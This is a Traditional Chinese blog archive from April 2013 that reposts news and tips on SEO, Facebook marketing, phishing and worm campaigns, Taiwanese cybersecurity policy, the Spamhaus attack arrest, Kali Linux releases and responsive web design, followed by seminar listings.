2013年4月30日 星期二

5個企業及站長最常犯的SEO錯誤


5個企業及站長最常犯的SEO錯誤
The Top Five SEO Mistakes According To Google’s Matt Cutts

Google反作弊小組主管Matt Cutts在最近發佈的網站管理員影片中,列舉了5個企業/站長最常犯的SEO錯誤。表面上看來這些只是很簡單、基本的東西,但是再仔細想想,它們背後其實隱含了做好SEO的重點。

1.根本沒有建構網站,或者網站沒辦法被搜尋爬行器找到;

2.沒有把對的文字用在網頁中-例如:不要寫“聖母峰海拔”,而是要寫人們會用來搜尋的字眼,像:“聖母峰有多高”;

3.只想著建立連結-應該專注於優質的內容和行銷方式;

4.忘記最重要和流量最多的網頁的標題和描述;

5.沒有善於利用網站管理員的資源、不瞭解Google如何運作、不知道SEO實質上是甚麼。


原文出處:Search Engine Land
轉載自《Inbound Journals》

8種增加粉絲互動率的必殺技


8種增加粉絲互動率的必殺技

根據 The Creative Group 預估今年公司將增加一倍的的行銷預算在 Facebook 上。所有人都知道 Facebook 簡單、方便的發文功能足以讓該訊息十傳千里,因此不少企業主都爭相的想跨入這領域而建立了粉絲專頁。但許多經營者在遇到不管怎麼發文粉絲就是不買單的情況往往就放棄經營專頁。最重要的一點:用戶往往不喜歡看到太商業性的貼文與用語,要提高互動需創造與粉絲息息相關的貼文,使其對貼文心有戚戚焉之感,自然會達成互動。這裡提供 8 種必殺絕招,提高與粉絲的互動率:

1. 運用問句
問句一直都是最好的互動模式,尤其對新手來說可以更快的讓粉絲對其問題做出回應,以下整理出幾個較常見的問句型態(如圖)
Ask Questions on Facebook

2. 發文最佳時間
我們都知道社群普遍使用時間總會有一高峰時段,若能找到高峰時段並以此時段為發文最佳時間,那觸及的範圍將會更廣。
據調查,大量分享貼文尖峰為中午 12 點及晚上 7 點過後。
science of social timing social networks

3. 照片貼文
圖片一直都比文字來的吸睛,發布貼文式能加入照片將能提高貼文吸引力,另外,若想修改貼文內容,照片貼文可針對該貼文進行修改。
Facebook Photo Engagement

4. 舉辦競賽/活動
活動也是另一種簡單增加互動的方式,而活動模式可依其粉絲專頁的屬性做任何變化。例如,若自認為自己的封面照片符合獨特、新奇、KUSO者,只要在 cacaFly 此篇貼文下方貼上自己封面照片的連結即可有機會獲得 Facebook 2000 元廣告抵用券
Facebook Contest

5. 外包粉絲回問題
另一種問題式互動 - 將粉絲所問的問題「外包」給其他粉絲,讓其他粉絲回答問題,除了增加粉絲間的互動還能為其有問題的粉絲獲得解答,一舉數得。
Crowdsourcing for Answers

6. 鼓勵粉絲付諸行動
「付諸行動」一直是行銷人很喜愛使用的心理學策略之一,因為能造成較大的迴響。例如,Subway 使用海邊的照片並留下:「如果您希望可以在週日享受海灘上的陽光渡假的話就按個讚吧!」果不其然,此篇貼文產生 53,000 個讚與 404 分享。
Facebook Call to Actions

7. 投遞廣告
下廣告是快速且有效能觸及更多人的方式之一。不同的廣告有不同的版位與功能,因此要下廣告時需先評量需透過此貼文達成什麼目標。
Facebook Ads Example

8. 貼文的頻率
根據 Buddy Media 的研究,一天大約發 1~2 次的貼文比起一天 3 次的貼文頻率產生多 40% 的互動率。
Facebook Posting Frequency

基本上以上 8 項小技巧只是大原則,粉絲專頁的經營還是得量身訂做、因地制宜地作調整喔。

原文出處:KISSmetrics
轉載自《cacaFly》

報告:網釣攻擊瞄準主機代管中心


報告:網釣攻擊瞄準主機代管中心

攻擊者通常利用網站管理工具(例如cPanel或Plesk)或平台套件(如WordPress或Joomla)的漏洞控制伺服器,APWG認為這些攻擊顯示主機代管業者、軟體開發者、密碼管理等方面的漏洞令人堪憂。 


國際反網路釣魚攻擊工作小組(Anti-Phishing Working Group, APWG)發表一份報告顯示,2012年駭客針對主機代管中心進行攻擊的比例升高,在2012年下半年佔全部釣魚攻擊的47%。

在頂級網域名稱方面,82%的釣魚攻擊事件集中在.com、.tk與.info三個頂級域名。所有的釣魚攻擊中所使用的域名只有約1.4%涉及品牌名稱或拼法接近品牌。遭釣魚攻擊的機構數量從上半年的486個成長至下半年的611個,對象包含金融業、電子商務網站、社群網站、ISP、政府財稅單位、線上遊戲等,而PayPal是最多攻擊的目標。

該份報告指出,一旦駭客潛入一台代管業者的網頁伺服器,就可以變更其系統設定,目的在每個網址內設置釣魚攻擊所需的網頁,而一個代管主機可能包含數百或數千個網址。攻擊者通常利用網站管理工具(例如cPanel或Plesk)或平台套件(如WordPress或Joomla)的漏洞控制伺服器,APWG認為這些攻擊顯示主機代管業者、軟體開發者、密碼管理等方面的漏洞令人堪憂。

該組織檢視2012年61台伺服器中發生的1.4萬次釣魚攻擊事件發現,去年八月是釣魚攻擊的高峰,之後數據稍有下降,但仍居高不下。據統計,去年下半年釣魚攻擊總共發生123,486件、涉及的網域名稱共89,748個,與上半年93,462件64,204個網域名稱相比成長很多。涉及釣魚攻擊的89,748個網域名稱中,駭客自己註冊的僅有5,835個,其餘83,913個都是入侵取得的。

不過駭客入侵之後,不單純只將這些伺服器作為釣魚攻擊之用。去年末一場稱為Darkleech的DDoS攻擊中,駭客控制上千台Apache網頁伺服器並裝上SSH後門,對美國金融業網站進行攻擊。雖然不確定駭客入侵這些伺服器的手法,但上述的網站管理工具或平台被懷疑是入侵的漏洞之一。

專家建議網站管理人員應該落實基本的檢測,例如察看伺服器日常記錄、檢驗伺服器設定是否正確等,以避免遭他人利用。根據Verizon的2013年資料外洩調查報告顯示,69%遭攻擊的單位是第三方發現,而且有66%是在被入侵一個月或更久之後才被發現。該報告也指出,2012年釣魚攻擊事件為2011年的四倍。

線上遊戲方面,玩家的個人資料、道具、遊戲中的錢幣或積分等,駭客都可以在黑市中銷售換取現金。另外遊戲伺服器比較不會頻繁更新伺服器,駭客也更容易抓到系統漏洞進行攻擊。

除了攻擊伺服器之外,駭客也利用病毒攔截資料。傳統釣魚攻擊中,駭客使用電子郵件夾帶釣魚用網址,欺騙使用者填入資料來取得控制帳號的必要資料,不過APWG認為現在的攻擊手法已經逐漸改變,駭客透過病毒感染瀏覽器,讓使用者在合法的網站與正常的操作中攔截這些資料。

轉載自《iThome》

視覺化表達 DDoS 的攻擊

視覺化表達 DDoS 的攻擊

說明:
這段攻擊影片是由玩家 Ludovic Fauvet 所製作,這是於2013/4/23對他們網站所發動的「DDoS」攻擊樣貌。
雖說單純文字上的解說沒辦法讓整個過程呈現出來,透過這段影片可以看出「DDoS」的攻擊有如同龜派氣功般的壯觀。

使用套件:Logstalgia
套件安裝:http://packages.ubuntu.com/zh-tw/lucid/logstalgia

↓一般正常的狀態


↓DDoS 的攻擊的狀態

節錄自《網路攻防戰》

2013年4月29日 星期一

波士頓爆炸案 蠕蟲軟體也來湊一腳!


波士頓爆炸案 蠕蟲軟體也來湊一腳!

波士頓馬拉松爆炸案相關連結點選前請小心,駭客攻擊就在你身邊。趨勢科技發現在波士頓馬拉松爆炸案發生的24小時內,已經有駭客以此為誘餌,透過垃圾郵件攻擊,以及社交平台散播內含蠕蟲WORM_KELIHOS.NB的惡意連結。該蠕蟲會竊取使用者的FTP帳號密碼與存在本機的電子郵件地址,同時監控受感染裝置的網路狀態以進一步竊取資料。除此之外,該蠕蟲會感染USB等卸除式裝置,達成其擴散目的。趨勢科技呼籲民眾對於近期與波士頓爆炸案相關網路訊息與電子郵件都應該保有一定程度戒心,不要輕易點選來路不明的連結是最佳自保之道。

運用波士頓馬拉松大爆炸 散播蠕蟲 竊取資訊 

波士頓馬拉松爆炸案發生後不到24小時內,趨勢科技已經偵測到超過9000封的以波士頓爆炸案為名的的垃圾郵件,更發現駭客以主旨為「Aftermath to explosion at Boston Marathon 」的垃圾郵件發動社交工程攻擊。該垃圾郵件夾帶連結http://{BLOCKED}/boston.html,使用者點選後將看到一段來自波士頓爆炸現場的影片,同時也下載了名為WORM_KELIHOS.NB的蠕蟲程式。該蠕蟲程式會透過被感染裝置竊取使用者FTP的帳號密碼與本機中的電子郵件地址,更會監控受感染裝置的網路流量以達成竊取資訊牟利的目的。為了避免被追查,駭客精心設計許多不同的蠕蟲程式下載點,下載IP位址來自阿根廷、台灣、烏克蘭、日本等地。


此蠕蟲也會透過USB磁碟等裝置散佈,並隱藏卸除裝置中所有資料夾。使用者在遭感染的裝置上看到的是與原資料夾相同名稱,實際上為LNK.的檔案。這些LNK檔的圖示看起來與一般目錄圖示一模一樣,使用者不疑有他點選並順利開啟資料的同時,該蠕蟲也成功擴散感染至電腦。

圖說:USB遭蠕蟲感染後,該蠕蟲以LNK檔案取代USB中所有的資料夾, 使用者一旦點選,電腦等裝置馬上被感染。 

趨勢科技也發現除了電子郵件攻擊外,也有駭客透過社群平台散發類似的惡意連結攻擊,民眾對於波士頓爆炸案相關連結,都應提高警覺勿輕易點選。


趨勢科技資深技術顧問簡勝財表示:「全球性關注的議題,一直都是駭客社交工程攻擊的最愛,因為人性的好奇心,往往是驅使人們點下惡意連結的最好誘餌。這次攻擊的主要目的是竊取受感染裝置內的資訊,以此牟利。此類攻擊一定會一再發生,因為人性的好奇心是駭客屢試不爽的弱點,民眾近期對於波士頓爆炸案相關的網路訊息應該保持戒心。但這類攻擊真的很難被查覺與預防,建議民眾應選取合適且具備網頁信譽評等,以及蠕蟲相關封鎖功能的資安軟體,才能有效捍衛個資與裝置安全。」

轉載自《資安人科技網》

國安局:攻擊38%來自本地 嵌入式系統成新目標

國安局:攻擊38%來自本地 嵌入式系統成新目標


日前南韓攻擊事件以及美聯社Twitter帳號被盜等資安事件對當地造成股市大跌、影響金融社會秩序等重大衝擊。國防部、國安局與行政院資安辦今(29)日在立法院提出因應報告並接受質詢,立法委員蕭美琴、林郁方等提出5臨時提案,要求上述單位能積極培育並網羅資安人才、公布演練成效、強化關鍵基礎建設保護等。

國安局副局長張光遠表示,目前遭受攻擊的主要對象已從政府機關、駐外館處,擴大到民間智庫、電信業者與委外廠商,而主要攻擊標的也轉向包括車輛交通號誌儀控設備、寬頻路由器、工業微電腦控制器、網路儲存系統等嵌入式系統上。張光遠進一步指出,許多工業電腦由於沒有防火牆保護因而成為駭客攻擊中繼站。根據國安局調查,目前的攻擊僅4.9%是直接來自於對岸,38%是以台灣本地的殭屍電腦或其他周邊國家電腦做為攻擊跳板,因此面臨10萬網軍,台灣雖然也有相關資訊戰部隊,卻無法直接「打回去」。

而上周高鐵發生控制訊號系統故障也成為質詢焦點,儘管此次事件已排除網軍所為,然立委認為民生關鍵基礎建設、嵌入式系統等弱點頻傳,因此提案要求國土安全辦公室主責統籌調查、資安辦協助辦理。

此外,美國、印度、澳洲政府已陸續要求政府機關避免採購中興與華為網通設備,蔡煌瑯、陳歐珀等人也關注台灣是否跟進,行政院資安辦蕭秀琴主任表示此事正在彙集各部會研議中。而政府機關本身今年的資安防護重點,包括今年起技服中心將以二線監控為主,並轉型為資安服務專案辦公室,以協助各機關導入資安SOC監控服務,以及今年將邀集政府、民間機關擴大辦理網路攻防演習等。為了讓各部會更加重視資安,立委也提案具體要求資安辦每六個月在行政院重要月會上公布演練成績單,包括各部會社交工程演練成果以及各部會資通安全通報演練成果。

資安人力始終是問題根本,有鑒於目前歐美、南韓及中國均競相積極培育資安人才,因此相關提案也包括國防部將在各軍事院校設立資訊安全專門系所,培育人才;同時應解決政府公務機關招募方式過於僵化的問題,以加速進行民間網路、資安專才的網羅與搜尋,將由資安辦、國防部、國安局並列負責。

轉載自《資安人科技網》

線上遊戲「私服」 不違著作權


線上遊戲「私服」 不違著作權

代理知名線上遊戲「天堂二」的吉恩立公司,前年對涉嫌協助私服業者收費的何姓等三共犯提告違反著作權法,一審原本判決有罪,但二審智財法院認定,私服業者並未更改遊戲創作或重製,改判無罪。

此件判決在實務界相當罕見,律師張紹斌說,業者修改IP位置,等於修改遊戲內容,已侵害「著作人格權」,更改遊戲難度、寶物價格當然違法;法官應該了解私服如何運作,才能做出正確判決。

台灣線上遊戲人數約五百萬人,產業規模超過兩百億元,部分業者為分一杯羹,架設簡稱「私服」的私人伺服器,修改遊戲登入路徑,玩家可以用低廉的價格玩遊戲、買寶物,因為私服與官方遊戲內容相同,搶走不少官方伺服器玩家。

判決書指出,郭姓男子四前年在大陸架設「天堂二」等私人伺服器對外收費營業,遊戲公司控告何男是違反著作權法的幫助犯,三人去年一月被台中地院分判四月不等刑期,郭男仍被通緝。

何男三人不服判決上訴,辯稱只借帳戶,沒有架設伺服器,不曉得違法。合議庭認為在私服打怪、練功都是正版遊戲內容,沒有非法重製遊戲內容,而修改IP位址不是更改創作,沒有侵害著作權,判何男等三人無罪,全案可上訴。

常玩線上遊戲的蔡姓上班族說,很多玩家「打怪」打得很辛苦,即使知道私服不合法,仍願意花小錢玩私服,比較有成就感;不少業者覬覦知名遊戲利潤,架設私服賺錢,早就不是秘密。

轉載自《聯合報/記者楊竣傑》

史上最大網路攻擊事件嫌犯落網 僅一人於西班牙遭逮捕


史上最大網路攻擊事件嫌犯落網 僅一人於西班牙遭逮捕

Hacker Attack
一名荷蘭藉公民,因涉嫌自某碉堡發動網際網路史上最大的網路攻擊,而於西班牙東北部遭到逮捕。西班牙官員於週日表示,該嫌犯並擁有一台具備能對該國任何地方網路發動入侵攻擊的廂型車。

「該名嫌犯開著他的廂型車在西班牙旅遊,該廂型車就有如行動運算辦公室,並配備了各種不同可以掃描頻率的天線,」西班牙內政部(Interior Ministry)發表聲明指出。

有關單位是遵照荷蘭當局所發出的歐盟逮捕令,而在週四離巴塞隆納35公里遠的Granollers市逮捕該名嫌犯。

該嫌犯被控訴攻擊總部橫跨瑞士、英國的反垃圾郵件監督機構Spamhaus,該監督機構主要任務在制止猖獗氾濫之仿冒威爾鋼與假減肥藥等廣告郵件。

當局聲明指出,辦案人員並發現電腦駭客碉堡,「該嫌犯甚至在該碉堡中接受不同國際性媒體的採訪。」

今年35歲、名字縮寫S.K.的嫌犯,出生於荷蘭西部的阿克馬(Alkmaar)市。當局並聲明指出,該嫌犯自稱是「網路碉堡共和國通訊暨外交部」(Telecommunications and Foreign Affairs Ministry of the Republic of Cyberbunker)的外交人員。

今年3月間,西班牙警方被荷蘭當局告知,有一個來自於西班牙,並對荷蘭、英國及美國網際網路服務造成影響的大型分散式阻斷服務攻擊(DDoS)出現,該攻擊最後是以對Spamhaus的連串猛攻而告終。

資料來源:smh-itpro
轉載自《網路資訊》

Kali Linux Basic Usage of Armitage Scan View and Exploit

Kali Linux Basic Usage of Armitage Scan View and Exploit

說明:
Kali Linux 透過Armitage簡單且容易的駭客工具來達到基本掃描、查看、利用以及攻擊片段,影片中另有註解!




節錄自《網路攻防戰》

2013年4月28日 星期日

毒駭 共軍木馬 藉漢光潛入國防部


毒駭 共軍木馬 藉漢光潛入國防部

國安局指出,共軍對台灣網路攻擊,利用社交工程,藉機從機關或重要人士周邊關係,迂迴方式突穿滲透,進行駭客攻擊。

國安局的憂慮,最近國防部剛好發生一件實例,據了解,國防部3月26日舉行記者會說明漢光29號演習,隔天有國防部幕僚收到署名「國防部作戰計畫次長室」寄發的漢光29號演習郵件,檢查證實是木馬郵件。

在外界對漢光29號演習內容好奇的背景下,這種郵件很容易被打開點閱,軍方將信件隔離,透過網路信箱系統,轉發至無用的手機信箱,重新開啟信件,系統效能果然大幅下降,判斷是中毒。

國安局指出,中共網軍為突破台灣防禦機制,大量利用社交工程,藉機從機關或重要人士周邊關係,以由近而遠,或由疏而密等迂迴方式,發動突穿滲透等駭客攻擊,在獲取內部網路最大控制權限後,盜竊偽造資訊或癱瘓網路通聯等。

行政院資通安全辦公室報告指出,政府部會僅行政院院本部及農委會全機關為驗證範圍通過ISMS資安驗證。行政院將籌辦國內大規模網路攻防演習,由各級政府機關擔任防守方,國安局、國防部、企業組織及學校機關擔任攻擊方,邀請其他國家共同參與交流經驗。

立法院外交國防委員會周一邀請行政院資通安全辦公室、國土安全辦公室、國安局、國防部、調查局、警政署,對網軍與駭客攻擊政府因應措施提出報告。

轉載自《聯合新聞網》

企業用盜版 員工恐要擔刑責


企業用盜版 員工恐要擔刑責

BSA台灣軟體聯盟提醒在各公司的員工,不要以為用盜版軟體,只有企業老闆會受罰,員工一樣會遭起訴、擔刑責。

BSA台灣軟體聯盟表示,根據全球BSA的軟體盜版案件歷史資料,遭起訴的被告,有高達1/3的比例是員工;顯示倘若企業使用盜版軟體,員工也得視其行為負擔刑責。若涉及非法重製,依著作權法可處3年以下有期徒刑、拘役,或科或併科新台幣75萬元以下罰金。

BSA呼籲企業員工,倘若發現公司使用盜版軟體,或雇主要求使用盜版軟體,絕對不該悶不吭聲配合,應該挺身而出要求老闆使用正版軟體,保護自身權益、遠離刑責風險。

BSA台灣軟體聯盟共同主席宋紅媞表示,許多企業員工因為公司沒有編列足夠預算採購合法軟體,要求員工「自行解決」業務所需的軟體需求,員工因而安裝盜版軟體,使得企業因使用盜版軟體遭查緝時,不但雇主遭到起訴,實際非法重製軟體的員工也遭殃被告。

轉載自《CNN中央通訊社》

Kali Linux 發佈 1.0.3 版

Kali Linux 發佈 1.0.3 版

Kali Speech Blog Post 1

說明:
知名滲透測試工具光碟 Kali Linux 於 4/26 發佈 1.0.3版。

新特色:
1.修正在 Debian 環境中 一些 GNOME Display Manager (GDM3) bugs。
2.增加了一些在安裝過程中會觸發語音引擎的"無障礙"功能。(快捷鍵:"S")
3.增加新的"Live Desktop"功能。

注意:
下載時並非所有下載區的映象檔均有更新到 1.0.3。
目前僅有"kali-linux-1.0.3-i386.iso"選項有新版。

下載處:http://www.kali.org/downloads/

2013年4月26日 星期五

社群平台夯 駭客喜愛攻擊


社群平台夯 駭客喜愛攻擊

針對24日駭客入侵美聯社推特散布假消息,一度衝擊美股;台灣資安廠商表示,現在媒體、閱聽眾大多利用社群平台來發布、接收訊息,社群平台已成駭客喜愛攻擊的管道。



24日傳敘利亞駭客盜用美聯社推特(twitter)帳號,貼出白宮遭炸彈襲擊、美國總統歐巴馬受傷的假消息,雖數分鐘後白宮澄清,但假消息一度引起美股急轉直下。

據外媒報導,美聯社企業網路先前多次被駭客用網路釣魚方式攻擊,目前美聯社正與推特公司共同調查是否有關聯。

台灣趨勢科技資深技術顧問簡勝財表示,使用人數眾多的社群平台,已成駭客喜愛攻擊的管道。

簡勝財表示,駭客攻擊的手法越來越精緻,利用「釣魚網頁」,或是利用「社交工程攻擊」對電腦植入惡意程式進行鍵盤側錄,簡直防不勝防。

簡勝財解釋,「釣魚網頁」就是在正常登入前,會跳出駭客假社交平台的名義編造的假網頁,要使用者輸入帳號、密碼;最常見的就是假安全認證之名,要登入再輸入一次,使用者常不疑有他填入,帳號密碼即遭盜取。

另外,簡勝財說,「社交工程攻擊」的手法,是駭客會以熟人名義寄送電子信件,收件人若進入點閱,電腦可能會被植入惡意程式,惡意程式會側錄之後鍵盤敲擊的紀錄,帳號密碼也就外流。

簡勝財表示,推特在歐美很普遍,所以這次美聯社遭駭事件會有影響力;台灣則是以臉書(Facebook)使用為大宗,要特別小心。尤其是網路服務提供商、新聞和證券監管機構在管理這些平台方面,要更謹慎的辨別網頁真假,對於Email的收發、點閱也要更有警覺性。

轉載自《CNN中央通訊社》

Responsive Design (RWD) 響應式網頁設計測試要點


Responsive Design (RWD) 響應式網頁設計測試要點

何謂Responsive Design (RWD)

文字

●標題斷行狀況,可參考 macho.js 或是 balance-text
●設定禁則,例如公司名稱或不可斷句之處可以設 white-space: nowrap;
●過長連續文字,例如網址是否有設定 word-break: break-all
●透過 media query 設定 br { display: none; } 也可改變不同寬度不斷行的方法
●內文一行是否超過 25—30 字,若超過則放大字體,若不及則縮小字體。

圖片

●img 元件若超出內容框,是否會隨寬度縮小,設定為 width: 100%; 或是 max-width: 100%;
●img 若 html 有指定 height 是否有被重設為 height: auto;

常用 plugin

●任何的互動如有 hover 才動作的設定,需改為其他方式
●互動按鈕是否夠大足以讓手指瞄準該按鈕
●過度消耗 CPU, GPU 資源的特效請偵測 user-agent 為桌面瀏覽器才做,或使用有相同意義的圖片取代
●如有使用類似 Scroll To Fixed 的固定方式,在 mobile 取消或隱藏
●js 簡易偵測方式 https://gist.github.com/evenwu/5151795 或使用 http://modernizr.com
●取消類似 lightbox 滿版效果,或是特別設計手機版呈現方式
●社群媒體如 facebook 的分享文字寬度是否會超出版面
●社群媒體 embed 的 iframe 高度是否有垂直跳動問題,可透過 min-height 解決

Media

●flash media 像是 youtube, vimeo 是否有修改為彈性縮放,可參考 http://fitvidsjs.com 或是 http://alistapart.com/article/creating-intrinsic-ratios-for-video

測試方式

●縮放測試的瀏覽器寬度
●使用 resizer tool / bookmarklet
●使用 fire.app 的 auto livereload
●安裝 Xcode 開啟 iOS simulator
●安裝 Android SDK

resizer tool

http://lab.maltewassermann.com/viewport-resizer/
最真實,含 zoom 效果
http://www.responsinator.com
給客戶一覽用,效果不錯
http://responsive.victorcoulon.fr
優點是含鍵盤佈局
http://www.benjaminkeen.com/open-source-projects/smaller-projects/responsive-design-bookmarklet/
速度最快,但缺點是JS會失效
http://screenqueri.es
http://codebomber.com/jquery/resizer/

不支援 media query 的瀏覽器

●IE 8 以前
●firefox 3 以前
●safari 3 以前
●Opera 9 以前
解決方案 https://github.com/scottjehl/Respond

轉載自《Evendesign》

2013年4月25日 星期四

2013 DCIM暨機房管理論壇


2013 DCIM暨機房管理論壇
乖乖大神 2013年教育召集令


  網路社群流傳一則故事:一位管理企業機房的資訊部MIS工程師,年初趁著設備更新的時候替換一批能耗不佳的伺服器,並改變機櫃配置提高散熱效果。年末會計報表指出,公司全年電費省下了20萬元,總經理獎勵負責此事的傑出員工,宣布將總務部主任調升為經理。
   
  作為資訊時代的營運核心,企業機房管理自然是企業管理工作重中之重!但誰是企業機房的權責部門?相信不同公司有不同的解釋。負責IT架構管理的MIS、以及負責營運自動化設備的總務後勤,雙方在企業機房管理工作的分野,總是有著模糊不清的曖昧。然而近年來透過IT技術與工具的運用,MIS、總務後勤兩者的工作似乎不再像是楚河漢界般地區隔。
   
  將總務後勤非IT領域的設備與環境也予以IT化管理,而IT人員也開始掌握機電系統、冷卻空調、弱電系統以及能耗管理…等機房管理相關工作…。解決方案供應商也順勢推動「資料中心基礎架構管理」(DCIM)概念。
   
  本年度【機房佈建與管理實務研討會】,主辦單位規劃在5月16日(四)於臺北六福皇宮舉辦。活動邀請到網路意見領袖−魔力門部落格版主ZMAN、以及台灣首次獲得Uptime Institute Tier III認證的IDC機房設計這之一的吳滄榮技師擔任專題講師。現場展示活動部分,台達電子、艾默生、伊頓飛瑞、寬普、APC、宏正、日商NTT、數位通、研華、3M、Cyber Power、艾爾新、儀信、黑盒、威圖、普詮、麟瑞等17家廠商,提出能耗管理、機櫃布線、環境監控等機房管理解決方案!
   
  主題深度、參展廠商家數,絕對歷年機房專業論壇之最!活動完全免費,歡迎各界營運E化、資訊/總務/工務相關部門從業者即早報名參加!

活動議程
Time
Topic
Speaker
08:30~09:00
機房整建工程實務案例分享
魔力門部落格版主
ZMAN   
09:30~10:10
高效益綠色資料中心
台達電子
  
10:10~10:50
智慧節能+監控新視野 剖析資料中心新觀點 
台灣艾默生網絡能源有限公司
應用工程經理   陳仲倉
10:50~11:10
中場休息Coffee Break
11:10~11:50
機房。逍遙遊
寬普數位科技
總經理   朱銘隆
11:50~12:30
虛擬化雲端系統之電力建置新技術 
伊頓飛瑞慕品股份有限公司
資深產品經理   楊永盛
12:30~13:30
午餐 Lunch
13:30~14:10
創新的工業關鍵電力解決方案
APC
資深業務協理   吳俊榮Kris Wu
14:10~14:50
NTT Communications Data Centre Solution - Change Today, Embrace the Future.
NTT Com Asia Limited
Director   Ken Suzuki
14:50~15:10
中場休息Coffee Break
15:10~15:50
機房智慧型監控應用方案
宏正自動科技
  
15:50~16:30
Uptime Institute Tier III認證,檢討台灣機房設計實務
台北市冷凍空調技師公會 理事長
廣知工程科技 總經理  
吳滄榮 技師


主辦單位  :  DIGITIMES
鑽石贊助  :  寬普數位、台達電子、艾默生網絡能源、伊頓飛瑞
黃金贊助  :  台灣恩悌悌、展碁國際、宏正自動科技
一般贊助  :  艾爾新、麟瑞、研華、數位通、黑盒、儀信、威圖
活動時間  :  09:00-17:00
會議地點  :  六福皇宮B3永樂殿(台北市松山區南京東路3段133號)
線上報名  :  線上報名、傳真報名:下載報名表
參加方式  :  免費活動 (請先線上報名,當天攜帶報到通知單與名片乙張即可)
傳真報名  :  +886-2-8712-0232
洽詢專線  :  +886-2-8712-8866 分機319 葉小姐
注意事項  :  本活動報名截止日為05月13日(一)。

從巨量資料中挖掘新契機研討會


從巨量資料中挖掘新契機研討會
檔不住的資料巨浪,檔不住商機洪朝!

市調機構IDC日前公布臺灣2013年10大科技趨勢預測中,2013年將會是臺灣企業實踐巨量資料應用元年。企業從評估解決方案,到邁向正式採用,臺灣將會有越來越多採用巨量資料分析的案例出現。

行動裝置與網路的普及下,改變了消費者與企業的互動關係,而這些平時毫不起眼的大量消費行為,在經過凝聚後,則可以產生意想不到的新商機。Big Data的應用增加,伴隨著企業決策也隨之改變,然而企業雖大多已了解巨量資料的重要性,但卻很少知道如何從中淘金,因此衍生出缺乏分析巨量資料的解決方案及人才等難題。
iThome將在本次活動中帶給各企業所需要的解決方案與業界經驗分享,希望能夠給各位不同的新思維與幫助,歡迎您蒞臨指教。

活動議程

時間
議程與活動
講師
08:30~09:00
Registration
09:00~09:10
Opening & Welcome
iThome電腦報 總編輯 吳其勳
09:10~09:50
巨量資料建置分享

09:50~10:30
企業先驅應用主題課程

10:30~10:50
Break
10:50~11:30
數據融合下的整合議題—
如何有效管理傳統數據與 大數據的ETL與交換作業
耐特普羅Netpro 技術總監 吳承諭
11:30~12:10
優化巨量資料為寶貴資訊智能的金囊妙計— 達梭系統 EXALEAD
麗臺科技 新事業處軟體產品部
業務副總經理 萬蕙茹
12:10~13:10
Noon Break
13:10~13:50
CISCO UCSBigData的最佳搭配
菁智科技股份有限公司
專案規劃師 李俊達
13:50~14:30
從資訊安全管理平台實際建置案例,看虛擬儲存在巨量資料的應用
DataCore台灣區 資深業務經理 陳文強
14:30~15:10
巨量資料的360度商務價值
Splunk 臺灣區總經理 林岳樺
15:10~15:30
Break
15:30~16:10
企業巨量資料建置分享

16:10~16:50
從大量資料到巨量資料-氣象資訊的加值應用
中央氣象局 資訊中心 洪景山博士
16:50~17:00
Q&A 抽獎


活動日期:2013年5月10日(五)08:30~17:00
活動地點:台北六福皇宮B3永康殿(台北市南京東路三段133號)
邀請對象:企業經營決策者、稽核機關、CIO以及IT部門工作者
活動方式:預先報名,經主辦單位確認符合活動屬性即可免費參與
洽詢服務:(02)25622880#3635 陳先生或來信 kevinchen@mail.ithome.com.tw
報名方式:線上報名

2013第九期品牌與行銷總監培訓課程


2013第九期品牌與行銷總監培訓課程
 
2013年5月19開課

品牌行銷的能力將決定您企業的未來,打造品牌除了決心毅力與金錢投入之外,關鍵人才及能力養成,是企業經營高層的市場洞悉能力與創新商業策略之能力。企業要打破舊思維,以最終市場角度來構思商業策略,市場與行銷將為決勝的關鍵。全國第一個「品牌與行銷總監培訓與認證」課程,自2007年9月第一期培訓班展開至今,我們培育過上百位主管,得到多家知名企業的肯定,是企業培育品牌與行銷主管的第一選擇,我們不但擁有完善的培訓計劃,也是人際關係連結的最佳平台,歡迎您參加本課程。

課程的安排從基礎能力的喚醒與養成,到實務運用、連橫及垂直整合的行銷力,課程的廣度安排,應用面齊全,以行銷理論為本,發展到數位行銷趨勢,讓行銷主管掌握行銷整體發展的面貌;課程的深度安排,貫穿外部的全球化思維與視野,以及內在管理者的領導與魅力。


名師簽署的專業認證
中華企業研究院所核發之結業及認證證書,皆由陳定國教授、何雍慶教授、趙義隆教授及馮仁厚執行總監簽署,不但具有專業力,亦俱備公信力,是求職升遷的最佳專業認證。

強大的師資陣容
(講座教授及課程時間表於開學時公佈, 課程進行期間如有異動, 以授課當天之資料為準)
以下預定名單, 依姓氏筆劃排序:
石賜亮 /  悠美國際公司董事長、企經會常務理事、『國家傑出經理獎』得獎人
朱承天 /  浙江衛視行銷主管
何雍慶 /  中正大學企管研究所教授、前所長及副校長、中華企經會常務理事
吳大松 /  花王(台灣)公司資深副總經理
吳青松 /  台灣大學國際企業研究所教授及前所長、中華民國行銷學會理事長
吳哲生 /  三商美邦人壽公司協理、中華企業研究院研究員及秘書長
呂鴻德 /  中原大學企業管理研究所教授
宋炎本 /  復華證券投資信託股份有限公司  執行副總
李取中 /  樂多 (樂多市場) 創辦人、大智文創志業執行長
周逸衡 /  中山大學企業管理研究所教授及教務長、副校長
周樹林 /  資策會產業情報研究所主任
邱俊龍 /  博客來數位科技公司(博客來網路書店)總經理特助
洪順慶 /  政治大學企業管理研究所教授及前所長
崔新冀 /  海馬實業公司總經理
曹中庸 /  納智傑汽車營銷副總經理
張志浩 /  奧美互動行銷公司董事總經理
張逸民 /  政治大學企業管理研究所教授
梁德馨 /  輔仁大學教育領導與發展研究所兼任教授及統計資訊系教授
許宏榮 /  三商行副總經理
許毓玲 /  台灣食益補(白蘭氏)公司行銷協理
陳定國 /  中華企業研究院公益董事長、台灣師範大學管理學院講座教授、亞洲大學管理學院前院長、淡江大學管理學院教授及前院長、前台灣大學商學系主任暨研究所所長及教授、中華企經會第九任理事長
陳韋仲 /  倍盛美傳媒公司董事總經理
陳振祥 /銘傳大學企業管理學系副教授兼進修推廣處處長
陳婉怡 /  香港商雅虎資訊台灣分公司公司搜尋行銷事業部業務協理
陸宛蘋 /  海棠文教基金會執行長
舒湘宜 /  智通策略公司總經理
馮仁厚 /  群仁管理顧問公司總經理、中華企業研究院研究員兼創新與組織管理研究中心執行總監
黃恆獎 /  台灣大學國際企業研究所教授及所長
黃健予 /  創曜產業顧問公司總經理、美商摩奇創意公司行銷副總經理
黃欽勇 /  電子時報社長,前資策會市場情報中心主任及駐美經理
楊文達 /  台灣華歌爾公司常務董事及執行副總經理
趙滿鈴 /  都可行銷公司總經理
